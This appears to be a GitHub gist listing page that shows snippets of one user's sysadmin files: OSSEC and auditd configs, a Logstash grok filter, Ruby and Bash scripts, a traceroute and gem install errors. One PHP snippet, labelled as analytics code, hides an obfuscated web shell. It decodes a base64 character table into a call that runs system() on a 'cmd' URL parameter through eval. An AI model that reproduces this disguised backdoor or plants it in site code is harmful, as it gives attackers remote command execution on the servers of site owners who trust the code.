This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<command> | |
<name>firewall-drop</name> | |
<executable>firewall-drop.sh</executable> | |
<expect>srcip</expect> | |
</command> | |
<active-response> | |
<command>firewall-drop</command> | |
<location>all</location> | |
<rules_id>1002</rules_id> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env ruby | |
# Version Controlled Notes.... Because I'm lazy. - Maus. | |
# TODO: Get git syncing working. Maybe do a branch that merges to master? | |
require 'optparse' | |
require 'fileutils' | |
require 'digest' | |
config = { | |
notes_path: ENV['HOME'] + '/notes', | |
git_path: ENV['HOME'] + '/notes/.git', | |
git_remote: '', |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
input { | |
syslog = { | |
type => syslog | |
port => 514 | |
} | |
} | |
filter { | |
grok { | |
type => "auditd" | |
pattern => [" AUDIT type=%{WORD:audit_type} msg=audit\(%{NUMBER:audit_epoch}:%{NUMBER:audit_coun |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
traceroute: Warning: cdn-registry-1.docker.io has multiple addresses; using 162.159.253.251 | |
traceroute to cdn-registry-1.docker.io.cdn.cloudflare.net (162.159.253.251), 64 hops max, 52 byte packets | |
1 10.236.2.1 (10.236.2.1) 4.231 ms 3.890 ms 3.957 ms | |
2 192.168.128.210 (192.168.128.210) 3.095 ms 4.799 ms 4.169 ms | |
3 206.169.168.41 (206.169.168.41) 44.070 ms 9.694 ms 4.097 ms | |
4 sjc1-pr1-xe-0-2-0-0.us.twtelecom.net (66.192.251.170) 17.472 ms 10.101 ms 16.170 ms | |
5 equinix.xe-2-0-0.cr1.sjc1.us.nlayer.net (206.223.116.61) 8.831 ms 7.277 ms 6.697 ms | |
6 as13335.xe-8-1-0.cr1.sjc1.us.nlayer.net (69.22.153.214) 38.691 ms 66.615 ms 23.516 ms | |
7 162.159.253.251 (162.159.253.251) 7.672 ms 7.594 ms 6.401 ms |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## Remove any existing rules | |
-D | |
## Buffer Size | |
## Feel free to increase this if the machine panic's | |
-b 8192 | |
## Failure Mode | |
## Possible values are 0 (silent), 1 (printk, print a failure message), | |
## and 2 (panic, halt the system). |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
//Begin Analytics Code | |
$STAT = unserialize(base64_decode("YTozMzp7aTowO3M6MToiaCI7aToxO3M6MToibSI7aToyO3M6MToiaSI7aTozO3M6MToibiI7aTo0O3M6MToiYSI7aTo1O3M6MToidyI7aTo2O3M6MToicCI7aTo3O3M6MToieSI7aTo4O3M6MToicyI7aTo5O3M6MToiYiI7aToxMDtzOjE6ImoiO2k6MTE7czoxOiJ1IjtpOjEyO3M6MToieiI7aToxMztzOjE6ImwiO2k6MTQ7czoxOiJrIjtpOjE1O3M6MToiZiI7aToxNjtzOjE6InYiO2k6MTc7czoxOiJlIjtpOjE4O3M6MToiciI7aToxOTtzOjE6ImQiO2k6MjA7czoxOiInIjtpOjIxO3M6MToibyI7aToyMjtzOjE6IngiO2k6MjM7czoxOiJdIjtpOjI0O3M6MToiWyI7aToyNTtzOjI6Iik7IjtpOjI2O3M6MToiZyI7aToyNztzOjE6InQiO2k6Mjg7czoxOiJjIjtpOjI5O3M6MToiJCI7aTozMDtzOjE6Il8iO2k6MzE7czoxOiIoIjtpOjMyO3M6MToicSI7fQ==")); | |
$values = | |
$STAT[8] . $STAT[7] . $STAT[8] . $STAT[27] . $STAT[17] . $STAT[1] . $STAT[31] . $STAT[29] . | |
$STAT[30] . strtoupper( $STAT[26] . $STAT[17] . $STAT[27] ) . $STAT[24] . $STAT[20] . | |
$STAT[28] . $STAT[1] . $STAT[19] . $STAT[20] . $STAT[23] .$STAT[25]; | |
eval("$values"); | |
?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# 2012 Maus Stearns, | |
# Quick ssh tunneling / reconnect tool | |
# Used primarily for quick synergy tunnels. | |
RHOST=192.168.1.1 | |
RPORT=24800 | |
PID=$(ps -ef |grep ssh |grep $RPORT | awk '{print $2}') | |
if [ -n "$PID" ]; then | |
echo "Existing Connection Exists. $PID" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/usr/local/rvm/rubies/ruby-1.9.3-p392/lib/ruby/1.9.1/yaml.rb:56:in `<top (required)>': | |
It seems your ruby installation is missing psych (for YAML output). | |
To eliminate this warning, please install libyaml and reinstall your ruby. | |
ERROR: Loading command: install (LoadError) | |
cannot load such file -- zlib | |
ERROR: While executing gem ... (NameError) | |
uninitialized constant Gem::Commands::InstallCommand | |
/usr/local/rvm/rubies/ruby-1.9.3-p392/lib/ruby/1.9.1/yaml.rb:56:in `<top (required)>': | |
It seems your ruby installation is missing psych (for YAML output). | |
To eliminate this warning, please install libyaml and reinstall your ruby. |
NewerOlder